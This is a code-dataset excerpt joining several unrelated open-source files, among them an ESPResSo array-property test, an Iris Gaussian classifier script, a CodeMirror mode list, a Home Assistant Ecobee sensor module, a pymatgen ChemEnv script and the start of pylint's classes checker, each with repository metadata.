self.assert_operator_usage_raises(self.system.part[0].pos_folded)
self.assert_operator_usage_raises(self.system.box_l)
check_array_writable(self.system.part[0].pos)
check_array_writable(self.system.part[0].v)
check_array_writable(self.system.part[0].f)
check_array_writable(self.system.box_l)
self.assert_copy_is_writable(self.system.part[0].pos)
self.assert_copy_is_writable(self.system.part[0].v)
self.assert_copy_is_writable(self.system.part[0].f)
self.assert_copy_is_writable(self.system.part[0].pos_folded)
self.assert_copy_is_writable(self.system.box_l)
@utx.skipIfMissingFeatures(["ROTATION"])
def test_rotation(self):
self.assert_operator_usage_raises(self.system.part[0].omega_lab)
self.assert_operator_usage_raises(self.system.part[0].quat)
self.assert_operator_usage_raises(self.system.part[0].rotation)
self.assert_operator_usage_raises(self.system.part[0].omega_body)
self.assert_operator_usage_raises(self.system.part[0].torque_lab)
if espressomd.has_features("EXTERNAL_FORCES"):
self.assert_operator_usage_raises(self.system.part[0].ext_torque)
check_array_writable(self.system.part[0].quat)
check_array_writable(self.system.part[0].omega_lab)
check_array_writable(self.system.part[0].rotation)
check_array_writable(self.system.part[0].omega_body)
check_array_writable(self.system.part[0].torque_lab)
if espressomd.has_features("EXTERNAL_FORCES"):
check_array_writable(self.system.part[0].ext_torque)
self.assert_copy_is_writable(self.system.part[0].omega_lab)
self.assert_copy_is_writable(self.system.part[0].quat)
self.assert_copy_is_writable(self.system.part[0].rotation)
self.assert_copy_is_writable(self.system.part[0].omega_body)
self.assert_copy_is_writable(self.system.part[0].torque_lab)
if espressomd.has_features("EXTERNAL_FORCES"):
self.assert_copy_is_writable(self.system.part[0].ext_torque)
@utx.skipIfMissingFeatures(["ROTATIONAL_INERTIA"])
def test_rotational_inertia(self):
self.assert_operator_usage_raises(self.system.part[0].rinertia)
check_array_writable(self.system.part[0].rinertia)
self.assert_copy_is_writable(self.system.part[0].rinertia)
@utx.skipIfMissingFeatures(["EXTERNAL_FORCES"])
def test_external_forces(self):
self.assert_operator_usage_raises(self.system.part[0].ext_force)
self.assert_operator_usage_raises(self.system.part[0].fix)
check_array_writable(self.system.part[0].ext_force)
check_array_writable(self.system.part[0].fix)
self.assert_copy_is_writable(self.system.part[0].ext_force)
self.assert_copy_is_writable(self.system.part[0].fix)
@utx.skipIfMissingFeatures(["ROTATION", "PARTICLE_ANISOTROPY"])
def test_rot_aniso(self):
self.assert_operator_usage_raises(self.system.part[0].gamma_rot)
check_array_writable(self.system.part[0].gamma_rot)
self.assert_copy_is_writable(self.system.part[0].gamma_rot)
def test_lb(self):
lbf = espressomd.lb.LBFluid(agrid=0.5, dens=1, visc=1, tau=0.01)
self.system.actors.add(lbf)
self.assert_operator_usage_raises(lbf[0, 0, 0].velocity)
self.assert_operator_usage_raises(lbf[0, 0, 0].pressure_tensor)
self.assert_operator_usage_raises(lbf[0, 0, 0].pressure_tensor_neq)
self.assert_operator_usage_raises(lbf[0, 0, 0].population)
@utx.skipIfMissingFeatures(["LANGEVIN_PER_PARTICLE",
"PARTICLE_ANISOTROPY"])
def test_langevinpp_aniso(self):
self.assert_operator_usage_raises(self.system.part[0].gamma)
check_array_writable(self.system.part[0].gamma)
self.assert_copy_is_writable(self.system.part[0].gamma)
@utx.skipIfMissingFeatures(["DIPOLES"])
def test_dipoles(self):
self.assert_operator_usage_raises(self.system.part[0].dip)
check_array_writable(self.system.part[0].dip)
self.assert_copy_is_writable(self.system.part[0].dip)
@utx.skipIfMissingFeatures(["EXCLUSIONS"])
def test_exclusions(self):
self.assert_operator_usage_raises(self.system.part[0].exclusions)
def test_partial_periodic(self):
self.assert_operator_usage_raises(self.system.periodicity)
check_array_writable(self.system.periodicity)
self.assert_copy_is_writable(self.system.periodicity)
if __name__ == "__main__":
ut.main()
|
KaiSzuttor/espresso
|
testsuite/python/array_properties.py
|
Python
|
gpl-3.0
| 8,586
|
[
"ESPResSo"
] |
0eb5f562603dbdd3ce4036b9b2998e095401602d195504f9b4ce64333629024e
|
__author__ = 'Mario'
__author__ = 'Mario'
import numpy as np
from scipy.stats import multivariate_normal as norm
import pandas as pd
import matplotlib.pyplot as plt
dataTraining = pd.read_table('./Data/iris_training.txt',delim_whitespace=True, header=None)
dataTest = pd.read_table('./Data/iris_test.txt',delim_whitespace=True, header=None)
#
# dataTraining = pd.read_table('./Data/wine_uci_train.txt',delim_whitespace=True, header=None)
# dataTest = pd.read_table('./Data/wine_uci_test.txt',delim_whitespace=True, header=None)
n = len(dataTraining)
nClassifiers = len(dataTraining.loc[0])
nTypesIris = 3
def readIrisTraining():
pass
# print dataIris[:3]
# print "this is: ", dataIris[0]
# print n
def gaussian(x, mu, cov):
# cov = np.cov([dataIris[dataIris[0]==1][1],dataIris[dataIris[0]==1][2]],
# dataIris[dataIris[0]==1][3],dataIris[dataIris[0]==1][4])
# print cov
# sigma1 = np.average(sigma)
# x = np.linspace(-4*sigma1,4*sigma1,4)
normPDF = norm.pdf(x,mu,cov)
return normPDF
def estimatedParameters(xArray):
mu = []
sigma = []
for i in range(1,nClassifiers):
mu.append(xArray[i].mean())
sigma.append((1.0/n)*(np.sum((xArray[i]-mu[i-1])**2)))
return mu, sigma
readIrisTraining()
parametersMu = []
parametersSigma = []
parametersCov = []
indexTable = dataTraining[dataTraining[0]]
for i in range(1,nTypesIris+1):
mu, sigma = estimatedParameters(dataTraining[dataTraining[0]==i])
parametersMu.append(mu)
parametersSigma.append(sigma)
covList = []
for j in range(1, nClassifiers):
covList.append(dataTraining[dataTraining[0]==i][1])
cov = np.cov([dataTraining[dataTraining[0]==i][1],dataTraining[dataTraining[0]==i][2],
dataTraining[dataTraining[0]==i][3],dataTraining[dataTraining[0]==i][4]])
cov = np.cov(np.array(covList))
parametersCov.append(cov)
parametersLen = len(parametersMu)
SuccessList = []
for i in range(0, len(dataTest)):
tempXMaximum = 0
maxDistribution = 0
x = dataTest.loc[i]
for j in range(0,parametersLen):
tempX = (gaussian(x[1:], parametersMu[j], parametersCov[j]))
if tempX > tempXMaximum:
tempXMaximum = tempX
maxDistribution = j
if dataTest[0][i] == maxDistribution+1:
SuccessList.append(1)
else:
SuccessList.append(0)
# print(SuccessList)
print(np.average(SuccessList))
# np.cov([dataIris[dataIris[0]==1][1],dataIris[dataIris[0]==1][2],dataIris[dataIris[0]==1][3],dataIris[dataIris[0]==1][4]])
|
marioharper182/Patterns
|
PatternRecognition/ProgrammingProject1/MaxLiklihood.py
|
Python
|
apache-2.0
| 2,560
|
[
"Gaussian"
] |
768c204e9c2f00ae95bb5bac8816156348c5e3a7e4af07d32bac8471425b1f38
|
# This file is generated by mk-codemirror-language-list.py.
# Probably don't edit it by hand.
# List of (mode_name, human_label, js_url)
CODEMIRROR_MODES = [
('apl', 'APL', '/static/codemirror/mode/apl/apl.js'),
('asn.1', 'ASN.1', '/static/codemirror/mode/asn.1/asn.1.js'),
('clike', 'C, C++, C#', '/static/codemirror/mode/clike/clike.js'),
('clike', 'Ceylon', '/static/codemirror/mode/clike/clike.js'),
('clike', 'Java', '/static/codemirror/mode/clike/clike.js'),
('clike', 'Kotlin', '/static/codemirror/mode/clike/clike.js'),
('clike', 'Objective C', '/static/codemirror/mode/clike/clike.js'),
('clike', 'Squirrel', '/static/codemirror/mode/clike/clike.js'),
('clojure', 'Clojure', '/static/codemirror/mode/clojure/clojure.js'),
('cmake', 'CMake', '/static/codemirror/mode/cmake/cmake.js'),
('cobol', 'COBOL', '/static/codemirror/mode/cobol/cobol.js'),
('coffeescript', 'CoffeeScript', '/static/codemirror/mode/coffeescript/coffeescript.js'),
('commonlisp', 'Common Lisp', '/static/codemirror/mode/commonlisp/commonlisp.js'),
('crystal', 'Crystal', '/static/codemirror/mode/crystal/crystal.js'),
('css', 'CSS', '/static/codemirror/mode/css/css.js'),
('cypher', 'Cypher', '/static/codemirror/mode/cypher/cypher.js'),
('d', 'D', '/static/codemirror/mode/d/d.js'),
('dart', 'Dart', '/static/codemirror/mode/dart/dart.js'),
('diff', 'diff', '/static/codemirror/mode/diff/diff.js'),
('django', 'Django template', '/static/codemirror/mode/django/django.js'),
('dockerfile', 'Dockerfile', '/static/codemirror/mode/dockerfile/dockerfile.js'),
('dtd', 'DTD', '/static/codemirror/mode/dtd/dtd.js'),
('dylan', 'Dylan', '/static/codemirror/mode/dylan/dylan.js'),
('ebnf', 'EBNF', '/static/codemirror/mode/ebnf/ebnf.js'),
('ecl', 'ECL', '/static/codemirror/mode/ecl/ecl.js'),
('eiffel', 'Eiffel', '/static/codemirror/mode/eiffel/eiffel.js'),
('elm', 'Elm', '/static/codemirror/mode/elm/elm.js'),
('erlang', 'Erlang', '/static/codemirror/mode/erlang/erlang.js'),
('factor', 'Factor', '/static/codemirror/mode/factor/factor.js'),
('fcl', 'FCL', '/static/codemirror/mode/fcl/fcl.js'),
('forth', 'Forth', '/static/codemirror/mode/forth/forth.js'),
('fortran', 'Fortran', '/static/codemirror/mode/fortran/fortran.js'),
('gas', 'Gas', '/static/codemirror/mode/gas/gas.js'),
('gfm', 'Markdown, GitHub-flavour', '/static/codemirror/mode/gfm/gfm.js'),
('gherkin', 'Gherkin', '/static/codemirror/mode/gherkin/gherkin.js'),
('go', 'Go', '/static/codemirror/mode/go/go.js'),
('groovy', 'Groovy', '/static/codemirror/mode/groovy/groovy.js'),
('haml', 'HAML', '/static/codemirror/mode/haml/haml.js'),
('handlebars', 'Handlebars', '/static/codemirror/mode/handlebars/handlebars.js'),
('haskell', 'Haskell', '/static/codemirror/mode/haskell/haskell.js'),
('haskell-literate', 'Haskell, Literate', '/static/codemirror/mode/haskell-literate/haskell-literate.js'),
('haxe', 'Haxe', '/static/codemirror/mode/haxe/haxe.js'),
('http', 'HTTP', '/static/codemirror/mode/http/http.js'),
('idl', 'IDL', '/static/codemirror/mode/idl/idl.js'),
('javascript', 'JavaScript', '/static/codemirror/mode/javascript/javascript.js'),
('jinja2', 'Jinja2', '/static/codemirror/mode/jinja2/jinja2.js'),
('jsx', 'JSX', '/static/codemirror/mode/jsx/jsx.js'),
('julia', 'Julia', '/static/codemirror/mode/julia/julia.js'),
('livescript', 'LiveScript', '/static/codemirror/mode/livescript/livescript.js'),
('lua', 'Lua', '/static/codemirror/mode/lua/lua.js'),
('markdown', 'Markdown', '/static/codemirror/mode/markdown/markdown.js'),
('mathematica', 'Mathematica', '/static/codemirror/mode/mathematica/mathematica.js'),
('mllike', 'F#', '/static/codemirror/mode/mllike/mllike.js'),
('mllike', 'OCaml', '/static/codemirror/mode/mllike/mllike.js'),
('modelica', 'Modelica', '/static/codemirror/mode/modelica/modelica.js'),
('nginx', 'Nginx', '/static/codemirror/mode/nginx/nginx.js'),
('nsis', 'NSIS', '/static/codemirror/mode/nsis/nsis.js'),
('ntriples', 'N-Triples/N-Quads', '/static/codemirror/mode/ntriples/ntriples.js'),
('octave', 'Octave', '/static/codemirror/mode/octave/octave.js'),
('oz', 'Oz', '/static/codemirror/mode/oz/oz.js'),
('pascal', 'Pascal', '/static/codemirror/mode/pascal/pascal.js'),
('pegjs', 'PEG.js', '/static/codemirror/mode/pegjs/pegjs.js'),
('perl', 'Perl', '/static/codemirror/mode/perl/perl.js'),
('php', 'PHP', '/static/codemirror/mode/php/php.js'),
('pig', 'Pig Latin', '/static/codemirror/mode/pig/pig.js'),
('plain-text', 'Plain text (no syntax highlighting)', ''),
('powershell', 'PowerShell', '/static/codemirror/mode/powershell/powershell.js'),
('protobuf', 'ProtoBuf', '/static/codemirror/mode/protobuf/protobuf.js'),
('pug', 'Pug', '/static/codemirror/mode/pug/pug.js'),
('puppet', 'Puppet', '/static/codemirror/mode/puppet/puppet.js'),
('python', 'Cython', '/static/codemirror/mode/python/python.js'),
('python', 'Python', '/static/codemirror/mode/python/python.js'),
('q', 'Q', '/static/codemirror/mode/q/q.js'),
('r', 'R', '/static/codemirror/mode/r/r.js'),
('rpm', 'RPM', '/static/codemirror/mode/rpm/rpm.js'),
('rst', 'reStructuredText', '/static/codemirror/mode/rst/rst.js'),
('ruby', 'Ruby', '/static/codemirror/mode/ruby/ruby.js'),
('rust', 'Rust', '/static/codemirror/mode/rust/rust.js'),
('sas', 'SAS', '/static/codemirror/mode/sas/sas.js'),
('sass', 'Sass', '/static/codemirror/mode/sass/sass.js'),
('scheme', 'Scheme', '/static/codemirror/mode/scheme/scheme.js'),
('shell', 'Shell', '/static/codemirror/mode/shell/shell.js'),
('sieve', 'Sieve', '/static/codemirror/mode/sieve/sieve.js'),
('slim', 'Slim', '/static/codemirror/mode/slim/slim.js'),
('smalltalk', 'Smalltalk', '/static/codemirror/mode/smalltalk/smalltalk.js'),
('smarty', 'Smarty', '/static/codemirror/mode/smarty/smarty.js'),
('solr', 'Solr', '/static/codemirror/mode/solr/solr.js'),
('soy', 'Soy', '/static/codemirror/mode/soy/soy.js'),
('sparql', 'SPARQL', '/static/codemirror/mode/sparql/sparql.js'),
('sql', 'SQL', '/static/codemirror/mode/sql/sql.js'),
('stex', 'sTeX, LaTeX', '/static/codemirror/mode/stex/stex.js'),
('stylus', 'Stylus', '/static/codemirror/mode/stylus/stylus.js'),
('swift', 'Swift', '/static/codemirror/mode/swift/swift.js'),
('tcl', 'Tcl', '/static/codemirror/mode/tcl/tcl.js'),
('textile', 'Textile', '/static/codemirror/mode/textile/textile.js'),
('tiddlywiki', 'Tiddlywiki', '/static/codemirror/mode/tiddlywiki/tiddlywiki.js'),
('tiki', 'Tiki wiki', '/static/codemirror/mode/tiki/tiki.js'),
('toml', 'TOML', '/static/codemirror/mode/toml/toml.js'),
('tornado', 'Tornado template', '/static/codemirror/mode/tornado/tornado.js'),
('troff', 'troff', '/static/codemirror/mode/troff/troff.js'),
('turtle', 'Turtle', '/static/codemirror/mode/turtle/turtle.js'),
('twig', 'Twig', '/static/codemirror/mode/twig/twig.js'),
('vb', 'VB.NET', '/static/codemirror/mode/vb/vb.js'),
('vbscript', 'VBScript', '/static/codemirror/mode/vbscript/vbscript.js'),
('velocity', 'Velocity', '/static/codemirror/mode/velocity/velocity.js'),
('verilog', 'Verilog/SystemVerilog', '/static/codemirror/mode/verilog/verilog.js'),
('vhdl', 'VHDL', '/static/codemirror/mode/vhdl/vhdl.js'),
('vue', 'Vue.js app', '/static/codemirror/mode/vue/vue.js'),
('webidl', 'Web IDL', '/static/codemirror/mode/webidl/webidl.js'),
('xml', 'XML/HTML', '/static/codemirror/mode/xml/xml.js'),
('xquery', 'XQuery', '/static/codemirror/mode/xquery/xquery.js'),
('yacas', 'Yacas', '/static/codemirror/mode/yacas/yacas.js'),
('yaml', 'YAML', '/static/codemirror/mode/yaml/yaml.js'),
('z80', 'Z80', '/static/codemirror/mode/z80/z80.js'),
]
HIGHLIGHT_SUBSTITUTIONS = {'clike': 'c', 'mllike': 'ocaml', 'stex': 'tex'}
|
sfu-fas/coursys
|
courselib/codemirror_language_list.py
|
Python
|
gpl-3.0
| 8,008
|
[
"CRYSTAL"
] |
275ab487ebfc73c8f6c63bd622834b5b32997add7226ea7150d8d968739e6fab
|
"""Support for Ecobee sensors."""
from pyecobee.const import ECOBEE_STATE_CALIBRATING, ECOBEE_STATE_UNKNOWN
from homeassistant.components.sensor import SensorEntity
from homeassistant.const import (
DEVICE_CLASS_HUMIDITY,
DEVICE_CLASS_TEMPERATURE,
PERCENTAGE,
TEMP_FAHRENHEIT,
)
from .const import _LOGGER, DOMAIN, ECOBEE_MODEL_TO_NAME, MANUFACTURER
SENSOR_TYPES = {
"temperature": ["Temperature", TEMP_FAHRENHEIT],
"humidity": ["Humidity", PERCENTAGE],
}
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up ecobee (temperature and humidity) sensors."""
data = hass.data[DOMAIN]
dev = []
for index in range(len(data.ecobee.thermostats)):
for sensor in data.ecobee.get_remote_sensors(index):
for item in sensor["capability"]:
if item["type"] not in ("temperature", "humidity"):
continue
dev.append(EcobeeSensor(data, sensor["name"], item["type"], index))
async_add_entities(dev, True)
class EcobeeSensor(SensorEntity):
"""Representation of an Ecobee sensor."""
def __init__(self, data, sensor_name, sensor_type, sensor_index):
"""Initialize the sensor."""
self.data = data
self._name = f"{sensor_name} {SENSOR_TYPES[sensor_type][0]}"
self.sensor_name = sensor_name
self.type = sensor_type
self.index = sensor_index
self._state = None
self._unit_of_measurement = SENSOR_TYPES[sensor_type][1]
@property
def name(self):
"""Return the name of the Ecobee sensor."""
return self._name
@property
def unique_id(self):
"""Return a unique identifier for this sensor."""
for sensor in self.data.ecobee.get_remote_sensors(self.index):
if sensor["name"] == self.sensor_name:
if "code" in sensor:
return f"{sensor['code']}-{self.device_class}"
thermostat = self.data.ecobee.get_thermostat(self.index)
return f"{thermostat['identifier']}-{sensor['id']}-{self.device_class}"
@property
def device_info(self):
"""Return device information for this sensor."""
identifier = None
model = None
for sensor in self.data.ecobee.get_remote_sensors(self.index):
if sensor["name"] != self.sensor_name:
continue
if "code" in sensor:
identifier = sensor["code"]
model = "ecobee Room Sensor"
else:
thermostat = self.data.ecobee.get_thermostat(self.index)
identifier = thermostat["identifier"]
try:
model = (
f"{ECOBEE_MODEL_TO_NAME[thermostat['modelNumber']]} Thermostat"
)
except KeyError:
_LOGGER.error(
"Model number for ecobee thermostat %s not recognized. "
"Please visit this link and provide the following information: "
"https://github.com/home-assistant/core/issues/27172 "
"Unrecognized model number: %s",
thermostat["name"],
thermostat["modelNumber"],
)
break
if identifier is not None and model is not None:
return {
"identifiers": {(DOMAIN, identifier)},
"name": self.sensor_name,
"manufacturer": MANUFACTURER,
"model": model,
}
return None
@property
def device_class(self):
"""Return the device class of the sensor."""
if self.type in (DEVICE_CLASS_HUMIDITY, DEVICE_CLASS_TEMPERATURE):
return self.type
return None
@property
def state(self):
"""Return the state of the sensor."""
if self._state in [
ECOBEE_STATE_CALIBRATING,
ECOBEE_STATE_UNKNOWN,
"unknown",
]:
return None
if self.type == "temperature":
return float(self._state) / 10
return self._state
@property
def unit_of_measurement(self):
"""Return the unit of measurement this sensor expresses itself in."""
return self._unit_of_measurement
async def async_update(self):
"""Get the latest state of the sensor."""
await self.data.update()
for sensor in self.data.ecobee.get_remote_sensors(self.index):
if sensor["name"] != self.sensor_name:
continue
for item in sensor["capability"]:
if item["type"] != self.type:
continue
self._state = item["value"]
break
|
w1ll1am23/home-assistant
|
homeassistant/components/ecobee/sensor.py
|
Python
|
apache-2.0
| 4,823
|
[
"VisIt"
] |
284c6c041981ab5548577fa849674c3b2a8e1a506100fd2e89b6754abed0e9e9
|
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
Development script of the ChemEnv utility to get the explicit permutations for coordination environments identified
with the separation plane algorithms (typically with coordination numbers >= 6)
"""
import itertools
import json
import numpy as np
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometries import (
AllCoordinationGeometries,
)
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometry_finder import (
AbstractGeometry,
LocalGeometryFinder,
)
from pymatgen.analysis.chemenv.utils.coordination_geometry_utils import Plane, collinear
if __name__ == "__main__":
# Choose the geometry
allcg = AllCoordinationGeometries()
while True:
cg_symbol = input("Enter symbol of the geometry for which you want to get the explicit permutations : ")
try:
cg = allcg[cg_symbol]
break
except LookupError:
print("Wrong geometry, try again ...")
continue
# Check if the algorithm currently defined for this geometry corresponds to the explicit permutation algorithm
for algo in cg.algorithms:
if algo.algorithm_type != "SEPARATION_PLANE":
raise ValueError("WRONG ALGORITHM !")
newalgos = []
ialgo = 1
for sepplanealgo in cg._algorithms:
print(f"In ialgo = {ialgo:d}/{len(cg._algorithms):d}")
ialgo += 1
if sepplanealgo.algorithm_type != "SEPARATION_PLANE":
raise ValueError("Should all be separation plane")
permsonfile = f"Permutations on file in this algorithm ({len(sepplanealgo._permutations):d}) "
print(permsonfile)
print(sepplanealgo._permutations)
permutations = sepplanealgo.safe_separation_permutations(
ordered_plane=sepplanealgo.ordered_plane, ordered_point_groups=sepplanealgo.ordered_point_groups
)
sepplanealgo._permutations = permutations
print(f"Test permutations ({len(permutations):d}) :")
print(permutations)
lgf = LocalGeometryFinder()
lgf.setup_parameters(structure_refinement=lgf.STRUCTURE_REFINEMENT_NONE)
lgf.setup_test_perfect_environment(
cg_symbol, randomness=True, indices=range(cg.coordination_number), max_random_dist=0.05
)
lgf.perfect_geometry = AbstractGeometry.from_cg(cg=cg)
# Setting up the plane of separation
local_plane = None
found = False
for npoints in range(sepplanealgo.minimum_number_of_points, min(sepplanealgo.maximum_number_of_points, 4) + 1):
if found:
break
for ipoints in itertools.combinations(sepplanealgo.plane_points, npoints):
points_combination = [lgf.local_geometry.coords[ipoint] for ipoint in ipoints]
if npoints == 2:
if collinear(
points_combination[0], points_combination[1], lgf.local_geometry.central_site, tolerance=0.25
):
continue
local_plane = Plane.from_3points(
points_combination[0], points_combination[1], lgf.local_geometry.central_site
)
found = True
break
elif npoints == 3:
if collinear(points_combination[0], points_combination[1], points_combination[2], tolerance=0.25):
continue
local_plane = Plane.from_3points(
points_combination[0], points_combination[1], points_combination[2]
)
found = True
break
elif npoints > 3:
local_plane = Plane.from_npoints(points_combination, best_fit="least_square_distance")
found = True
break
else:
raise ValueError("Wrong number of points to initialize separation plane")
points_perfect = lgf.perfect_geometry.points_wocs_ctwocc()
# Actual test of the permutations
cgsm = lgf._cg_csm_separation_plane(
coordination_geometry=cg,
sepplane=sepplanealgo,
local_plane=local_plane,
plane_separations=[],
dist_tolerances=[0.05, 0.1, 0.2, 0.3],
testing=True,
points_perfect=points_perfect,
)
print(cgsm)
if cgsm[0] is None:
print("IS NONE !")
input()
continue
csms, perms, algos, sep_perms = cgsm[0], cgsm[1], cgsm[2], cgsm[3]
print("Continuous symmetry measures")
print(csms)
csms_with_recorded_permutation = []
explicit_permutations = []
for icsm, csm in enumerate(csms):
found = False
for csm2 in csms_with_recorded_permutation:
if np.isclose(csm, csm2, rtol=0.0, atol=1.0e-6):
found = True
break
if not found:
print(perms[icsm], csm)
csms_with_recorded_permutation.append(csm)
explicit_permutations.append(sep_perms[icsm])
print(permsonfile)
print(f"Permutations found ({len(explicit_permutations):d}) : ")
print(explicit_permutations)
sepplanealgo.explicit_permutations = explicit_permutations
newalgos.append(sepplanealgo)
# Write update geometry file ?
test = input('Save it ? ("y" to confirm)')
if test == "y":
cg._algorithms = newalgos
cg_dict = cg.as_dict()
f = open(f"../coordination_geometries_files_new/{cg_symbol}.json", "w")
json.dump(cg_dict, f)
f.close()
|
materialsproject/pymatgen
|
dev_scripts/chemenv/explicit_permutations_plane_algorithm.py
|
Python
|
mit
| 5,857
|
[
"pymatgen"
] |
eaf54af0f2cf94387c12835917fbd9722fbf12f3dc6f25c9294906a4347a6040
|
# Copyright (c) 2003-2014 LOGILAB S.A. (Paris, FRANCE).
# http://www.logilab.fr/ -- mailto:contact@logilab.fr
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""classes checker for Python code
"""
from __future__ import generators
import sys
from collections import defaultdict
import astroid
from astroid import YES, Instance, are_exclusive, AssAttr, Class
from astroid.bases import Generator, BUILTINS
from astroid.inference import InferenceContext
from pylint.interfaces import IAstroidChecker
from pylint.checkers import BaseChecker
from pylint.checkers.utils import (
PYMETHODS, overrides_a_method, check_messages, is_attr_private,
is_attr_protected, node_frame_class, safe_infer, is_builtin_object,
decorated_with_property, unimplemented_abstract_methods)
import six
if sys.version_info >= (3, 0):
NEXT_METHOD = '__next__'
else:
NEXT_METHOD = 'next'
ITER_METHODS = ('__iter__', '__getitem__')
def _called_in_methods(func, klass, methods):
""" Check if the func was called in any of the given methods,
belonging to the *klass*. Returns True if so, False otherwise.
"""
if not isinstance(func, astroid.Function):
return False
for method in methods:
try:
infered = klass.getattr(method)
except astroid.NotFoundError:
continue
for infer_method in infered:
for callfunc in infer_method.nodes_of_class(astroid.CallFunc):
try:
bound = next(callfunc.func.infer())
except (astroid.InferenceError, StopIteration):
continue
if not isinstance(bound, astroid.BoundMethod):
continue
func_obj = bound._proxied
if isinstance(func_obj, astroid.UnboundMethod):
func_obj = func_obj._proxied
if func_obj.name == func.name:
return True
return False
def class_is_abstract(node):
"""return true if the given class node should be considered as an abstract
class
"""
for method in node.methods():
if method.parent.frame() is node:
if method.is_abstract(pass_is_abstract=False):
return True
return False
def _is_attribute_property(name, klass):
""" Check if the given attribute *name* is a property
in the given *klass*.
It will look for `property` calls or for functions
with the given name, decorated by `property` or `property`
subclasses.
Returns ``True`` if the name is a property in the given klass,
``False`` otherwise.
"""
try:
attributes = klass.getattr(name)
except astroid.NotFoundError:
return False
property_name = "{0}.property".format(BUILTINS)
for attr in attributes:
try:
infered = next(attr.infer())
except astroid.InferenceError:
continue
if (isinstance(infered, astroid.Function) and
decorated_with_property(infered)):
return True
if infered.pytype() == property_name:
return True
return False
MSGS = {
'F0202': ('Unable to check methods signature (%s / %s)',
'method-check-failed',
'Used when Pylint has been unable to check methods signature \
compatibility for an unexpected reason. Please report this kind \
if you don\'t make sense of it.'),
'E0202': ('An attribute defined in %s line %s hides this method',
'method-hidden',
'Used when a class defines a method which is hidden by an '
'instance attribute from an ancestor class or set by some '
'client code.'),
'E0203': ('Access to member %r before its definition line %s',
'access-member-before-definition',
'Used when an instance member is accessed before it\'s actually\
assigned.'),
'W0201': ('Attribute %r defined outside __init__',
'attribute-defined-outside-init',
'Used when an instance attribute is defined outside the __init__\
method.'),
'W0212': ('Access to a protected member %s of a client class', # E0214
'protected-access',
'Used when a protected member (i.e. class member with a name \
beginning with an underscore) is access outside the class or a \
descendant of the class where it\'s defined.'),
'E0211': ('Method has no argument',
'no-method-argument',
'Used when a method which should have the bound instance as \
first argument has no argument defined.'),
'E0213': ('Method should have "self" as first argument',
'no-self-argument',
'Used when a method has an attribute different the "self" as\
first argument. This is considered as an error since this is\
a so common convention that you shouldn\'t break it!'),
'C0202': ('Class method %s should have %s as first argument', # E0212
'bad-classmethod-argument',
'Used when a class method has a first argument named differently '
'than the value specified in valid-classmethod-first-arg option '
'(default to "cls"), recommended to easily differentiate them '
'from regular instance methods.'),
'C0203': ('Metaclass method %s should have %s as first argument', # E0214
'bad-mcs-method-argument',
'Used when a metaclass method has a first agument named '
'differently than the value specified in valid-classmethod-first'
'-arg option (default to "cls"), recommended to easily '
'differentiate them from regular instance methods.'),
'C0204': ('Metaclass class method %s should have %s as first argument',
'bad-mcs-classmethod-argument',
'Used when a metaclass class method has a first argument named '
'differently than the value specified in valid-metaclass-'
'classmethod-first-arg option (default to "mcs"), recommended to '
'easily differentiate them from regular instance methods.'),
'W0211': ('Static method with %r as first argument',
'bad-staticmethod-argument',
'Used when a static method has "self" or a value specified in '
'valid-classmethod-first-arg option or '
'valid-metaclass-classmethod-first-arg option as first argument.'
),
'R0201': ('Method could be a function',
'no-self-use',
'Used when a method doesn\'t use its bound instance, and so could\
be written as a function.'
),
'E0221': ('Interface resolved to %s is not a class',
'interface-is-not-class',
'Used when a class claims to implement an interface which is not \
a class.'),
'E0222': ('Missing method %r from %s interface',
'missing-interface-method',
'Used when a method declared in an interface is missing from a \
class implementing this interface'),
'W0221': ('Arguments number differs from %s %r method',
'arguments-differ',
'Used when a method has a different number of arguments than in \
the implemented interface or in an overridden method.'),
'W0222': ('Signature differs from %s %r method',
'signature-differs',
'Used when a method signature is different than in the \
implemented interface or in an overridden method.'),
'W0223': ('Method %r is abstract in class %r but is not overridden',
'abstract-method',
'Used when an abstract method (i.e. raise NotImplementedError) is \
not overridden in concrete class.'
),
'F0220': ('failed to resolve interfaces implemented by %s (%s)', # W0224
'unresolved-interface',
'Used when a Pylint as failed to find interfaces implemented by \
a class'),
'W0231': ('__init__ method from base class %r is not called',
'super-init-not-called',
'Used when an ancestor class method has an __init__ method \
which is not called by a derived class.'),
'W0232': ('Class has no __init__ method',
'no-init',
'Used when a class has no __init__ method, neither its parent \
classes.'),
'W0233': ('__init__ method from a non direct base class %r is called',
'non-parent-init-called',
'Used when an __init__ method is called on a class which is not \
in the direct ancestors for the analysed class.'),
'W0234': ('__iter__ returns non-iterator',
'non-iterator-returned',
'Used when an __iter__ method returns something which is not an \
iterable (i.e. has no `%s` method)' % NEXT_METHOD),
'E0235': ('__exit__ must accept 3 arguments: type, value, traceback',
'bad-context-manager',
'Used when the __exit__ special method, belonging to a \
context manager, does not accept 3 arguments \
(type, value, traceback).'),
'E0236': ('Invalid object %r in __slots__, must contain '
'only non empty strings',
'invalid-slots-object',
'Used when an invalid (non-string) object occurs in __slots__.'),
'E0237': ('Assigning to attribute %r not defined in class slots',
'assigning-non-slot',
'Used when assigning to an attribute not defined '
'in the class slots.'),
'E0238': ('Invalid __slots__ object',
'invalid-slots',
'Used when an invalid __slots__ is found in class. '
'Only a string, an iterable or a sequence is permitted.'),
'E0239': ('Inheriting %r, which is not a class.',
'inherit-non-class',
'Used when a class inherits from something which is not a '
'class.'),
}
class ClassChecker(BaseChecker):
"""checks for :
* methods without self as first argument
* overridden methods signature
* access only to existent members via self
* attributes not defined in the __init__ method
* supported interfaces implementation
* unreachable code
"""
__implements__ = (IAstroidChecker,)
# configuration section name
name = 'classes'
# messages
msgs = MSGS
priority = -2
# configuration options
options = (('ignore-iface-methods',
{'default' : (#zope interface
'isImplementedBy', 'deferred', 'extends', 'names',
'namesAndDescriptions', 'queryDescriptionFor', 'getBases',
